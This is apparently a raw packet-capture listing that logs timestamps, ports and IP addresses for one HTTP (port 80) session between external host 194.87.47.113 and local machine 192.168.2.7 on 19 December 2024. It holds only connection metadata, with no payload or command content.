Dec 19, 2024 08:47:31.362723112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.362791061 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.363070965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.363370895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.363450050 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.363791943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.364001036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.364116907 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.364577055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.364846945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.364972115 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.365441084 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.365664959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.365704060 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.366210938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.366223097 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.366282940 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.367033005 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.367181063 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.367341995 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.367793083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.367980957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.368046045 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.368623018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.368989944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.369065046 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.369328976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.369668961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.369792938 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.370165110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.370388031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.370474100 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.370970011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.371124983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.371184111 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.371845961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.371956110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.372004986 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.372536898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.372706890 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.372863054 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.373311996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.373528957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.373600006 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.374205112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.374468088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.374535084 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.375025988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.375173092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.375258923 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.375804901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.375979900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.376060009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.376492977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.376780033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.376823902 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.377326012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.377939939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.378019094 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.378140926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.378151894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.378200054 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.378855944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.379609108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.379683971 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.379868031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.380141020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.380276918 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.380445957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.380764008 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.380899906 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.381311893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.381474018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.381542921 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.382005930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.382211924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.382320881 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.382847071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.382858038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.382919073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.383662939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.384125948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.384174109 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.384505033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.384852886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.384993076 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.385265112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.385484934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.385559082 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.386046886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.386066914 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.386146069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.386847019 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.386990070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.387036085 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.387607098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.388453960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.388464928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.388504982 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.388730049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.388828039 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.389128923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.389401913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.389452934 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.390010118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.434638977 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.529462099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.529711008 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.529721022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.529805899 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.530195951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.530337095 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.530570030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.530905008 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.530949116 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.531277895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.541734934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.541852951 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.542109966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.542119980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.542227030 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.542561054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.542917967 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.542927027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.543050051 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.543591976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.543685913 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.543950081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.544222116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.544307947 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.544711113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.544719934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.544768095 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.545492887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.545763969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.545815945 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.546000004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.546551943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.546614885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.546744108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.547370911 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.547379017 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.547534943 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.548140049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.548331976 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.548415899 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.548917055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.549009085 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.551479101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.551724911 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.551834106 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.552112103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.552390099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.552618980 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.552706003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.553050041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.553106070 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.553411961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.553765059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.553811073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.554043055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.554503918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.554620981 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.554881096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.555341959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.555444002 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.555680037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.556195021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.556240082 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.556349039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.556876898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.556926012 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.557281971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.557717085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.557724953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.557784081 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.558460951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.558556080 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.559278965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.559288025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.559333086 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.559629917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.560086012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.560094118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.560162067 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.560846090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.561079979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.561115026 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.561634064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.561717033 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.561835051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.562441111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.562494040 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.563401937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.563412905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.563476086 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.563581944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.563998938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.564080954 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.564332962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.564908981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.565004110 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.565376043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.565574884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.565689087 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.565846920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.566500902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.566660881 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.566756010 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.567179918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.567262888 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.567352057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.568015099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.568037987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.568093061 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.568768024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.568850994 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.569144964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.569555998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.569752932 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.570276022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.570491076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.570499897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.570581913 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.571177006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.571336985 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.571947098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.571955919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.572020054 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.572274923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.572776079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.572858095 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.572988987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.573506117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.573653936 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.574032068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.574331045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.574431896 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.574815989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.575078964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.575272083 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.575352907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.575870991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.575936079 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.576055050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.576669931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.576800108 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.576960087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.577450991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.577590942 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.577749014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.578238964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.578530073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.578856945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.579056025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.579113007 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.579760075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.579938889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.579947948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.580018997 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.580607891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.580811024 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.580982924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.581475973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.581543922 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.581779003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.582248926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.582333088 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.721721888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.721869946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.721956968 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.722229004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.722239971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.722282887 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.722951889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.723252058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.723304987 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.723630905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.733937025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.734018087 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.734355927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.734364986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.734414101 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.734836102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.735200882 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.735209942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.735292912 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.736025095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.736131907 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.736363888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.736834049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.736929893 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.737020969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.737030983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.737088919 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.737679958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.738039970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.738172054 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.738468885 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.738722086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.738847017 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.739341021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.739955902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.740001917 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.740217924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.740226030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.740351915 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.740854025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.742023945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.742167950 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.743674040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.743856907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.743864059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.743927002 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.744251966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.744302988 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.744703054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.745141983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.745198965 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.745583057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.745650053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.745702028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.745996952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.746198893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.746344090 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.746798038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.747520924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.747731924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.747747898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.748423100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.748439074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.748471975 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.748471975 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.748471975 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.749171972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.749439001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.749960899 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.750158072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:31.750732899 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:31.750732899 CET	49707	80	192.168.2.7	194.87.47.113
